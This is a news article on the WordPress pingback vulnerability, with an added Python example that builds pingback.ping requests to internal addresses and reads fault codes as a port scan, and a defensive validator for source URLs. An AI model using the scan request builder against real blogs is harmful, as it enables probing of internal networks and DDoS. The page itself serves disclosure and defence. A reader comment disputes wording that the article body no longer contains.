WordPress Pingback Vulnerability Could Lead to DDoS Attacks

A flaw in the way the WordPress blogging platform handles pingbacks could leak information about a blog's internal network and be abused for distributed denial of service (DDoS) attacks with nothing more than a script, according to web application security firm Acunetix.

A pingback is the mechanism blog owners rely on to learn who is linking to their posts: when one blog links to a post on another, it sends the second blog an XML-RPC notification carrying the source and target URLs. When WordPress receives one, it fetches the source URL to verify that the link really exists and, if it does, usually records the pingback as a comment on the referenced post.

According to Acunetix's Bogdan Calin, this particular vulnerability is exploitable through the platform's XML-RPC API (xmlrpc.php), which accepts the pingback.ping call from anyone and has the blog fetch whatever source URL the caller supplies. That turns the blog into a proxy: attackers can guess hosts inside the network the blog sits on, port scan those hosts by watching how the blog responds, send crafted URLs to reconfigure internal routers and, by pointing many blogs at one victim, launch large scale DDoS attacks.

The attack has been automated in a new tool currently distributed on the software development site GitHub. The tool drives the API to scan other hosts, works across multiple WordPress blogs at once and, with a specially crafted URL, can reconfigure routers.
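To make the port-scan primitive concrete, here is an added example (not code from the article, from WordPress, or from the GitHub tool it mentions) that builds the pingback.ping call xmlrpc.php accepts and classifies the blog's reply. The fault codes are the ones WordPress's pingback handler returns; the internal address, blog URL and sample replies are constructed for the example, and in a real run the replies would come off the wire from the blog's xmlrpc.php.

```python
"""Added example: what a pingback.ping request looks like, and what the
blog's reply tells the caller about the host and port in the source URL.
Not code from the article or the tool it describes; all data is constructed."""
import xmlrpc.client

# Fault codes returned by WordPress's pingback_ping() handler
FAULT_SOURCE_UNREACHABLE = 16  # "The source URL does not exist."
FAULT_SOURCE_HAS_NO_LINK = 17  # source was fetched but contains no link to the target
FAULT_BAD_TARGET = 33          # target is not a pingback-enabled post on this blog
FAULT_ALREADY_REGISTERED = 48  # this source already pinged that post


def build_pingback_request(source_uri, target_uri):
    """Serialise pingback.ping(sourceURI, targetURI) as the body of a POST to
    /xmlrpc.php. The blog fetches source_uri itself, which is the problem:
    the caller chooses the host and port that the blog connects to."""
    return xmlrpc.client.dumps((source_uri, target_uri),
                               methodname="pingback.ping").encode("utf-8")


def classify_reply(reply_xml):
    """Map the blog's XML-RPC reply to what it reveals about source_uri."""
    try:
        xmlrpc.client.loads(reply_xml)
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == FAULT_SOURCE_UNREACHABLE:
            return "closed"      # connection failed: port closed/filtered or no host
        if fault.faultCode == FAULT_SOURCE_HAS_NO_LINK:
            return "open"        # something answered the HTTP request
        if fault.faultCode == FAULT_BAD_TARGET:
            return "bad-target"  # target_uri is not a post on this blog
        return "fault-%d" % fault.faultCode
    return "open"                # success: source fetched and it linked to the target


def fake_fault_reply(fault_code, message):
    """Constructed stand-in for a fault reply that would normally come from the blog."""
    return xmlrpc.client.dumps(xmlrpc.client.Fault(fault_code, message),
                               methodresponse=True)


def fake_success_reply(message):
    """Constructed stand-in for the success reply (pingback registered)."""
    return xmlrpc.client.dumps((message,), methodresponse=True)


def scan_from_replies(replies_by_port):
    """Given {port: reply_xml} collected from one blog for one internal host,
    return {port: 'open' | 'closed' | ...}."""
    return {port: classify_reply(xml) for port, xml in replies_by_port.items()}


# Constructed replies for a scan of 192.168.1.1 routed through a blog.
SAMPLE_REPLIES = {
    22: fake_fault_reply(16, "The source URL does not exist."),
    80: fake_fault_reply(17, "The source URL does not contain a link to the "
                             "target URL, and so cannot be used as a source."),
    443: fake_fault_reply(16, "The source URL does not exist."),
}

if __name__ == "__main__":
    body = build_pingback_request("http://192.168.1.1:80/", "http://blog.example/?p=1")
    print(body.decode("utf-8"))
    print(scan_from_replies(SAMPLE_REPLIES))
```

The distinguishing signal is fault 16 versus fault 17: the blog only reaches the "no link to the target" branch after its own HTTP request to the attacker-chosen host and port succeeded. Response time adds a second channel (a filtered port tends to time out rather than fail fast), which is why settings that leave xmlrpc.php answering pingback.ping do not remove the primitive.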

The flaw was first brought to WordPress' attention more than five years ago, in April 2007, but the ticket was closed when a core developer said he wasn't sure it was worth bothering with, adding that there are "so many ways to orchestrate a DDoS."

Calin notes that there is no fix for the vulnerability yet, but that it has once again been brought to WordPress' attention. His blog entry adds that even disabling pingbacks and trackbacks in a blog's settings does not close the hole, so a patch seems inevitable at this point.
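Whatever the eventual patch looks like, the check a pingback handler needs is on the source URL before anything is fetched. The following is an added example of that check, written by the editor of this page; it is not WordPress code and not the fix the article anticipates. The hostnames, addresses and resolver table are constructed so that it runs offline, and the fixed port set is a policy choice made here to remove the port-scanning primitive.

```python
"""Added example: validate a pingback source URL before the blog fetches it.
Not WordPress code; hostnames, addresses and the resolver table are constructed."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # policy choice for this example: no arbitrary ports


def address_is_public(ip_text):
    """True only for a globally routable unicast address."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_pingback_source(url, resolve):
    """Return (ok, reason). `resolve` maps a hostname to a list of IP strings.
    It is injected so the check runs offline and so the caller can pin the same
    addresses when it fetches; re-resolving at fetch time allows DNS rebinding."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        ipaddress.ip_address(host)  # literal address: no lookup needed
        addresses = [host]
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return False, "host does not resolve"
    # Every answer must be public; one internal address in the set is enough to reject.
    for addr in addresses:
        if not address_is_public(addr):
            return False, "resolves to non-public address %s" % addr
    return True, "ok"


# Constructed resolver table standing in for DNS.
RESOLVER_TABLE = {
    "blog.example": ["93.184.216.34"],
    "intranet.corp.example": ["10.20.30.40"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],
}


def lookup(host):
    return RESOLVER_TABLE.get(host, [])


if __name__ == "__main__":
    for candidate in ("http://blog.example/2012/12/post/",
                      "http://intranet.corp.example:8080/",
                      "http://192.168.1.1/",
                      "http://rebind.example/",
                      "ftp://blog.example/"):
        print(candidate, check_pingback_source(candidate, lookup))
```

Rejecting private, loopback and link-local addresses stops the blog being used as a proxy into its own network, and the fixed port set removes the port-scan signal; neither limits the number of pingbacks a single source can trigger, so rate limiting per caller and per target is still needed for the DDoS case.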

WordPress, the open source project (Automattic runs the separate WordPress.com service), has experienced its fair share of security bugs in 2012. Automatic update malware was found infecting blogs in May, a handful of bogus themes left blogs open to cross-site scripting (XSS) attacks in October, and just last week WordPress sites, along with Joomla sites, were being targeted by iFrame injection attacks.

Discussion

  • Andrea_R on

    "Automattic, the makers of WordPress"

    This is incorrect. WordPress.org is an open source project.

    Automattic the company uses the software for the wordpress.com *service*.

    While some Automattic employees contribute to the WordPress codebase, they do not control or own it outright. They do not even own the trademark - the WP Foundation does.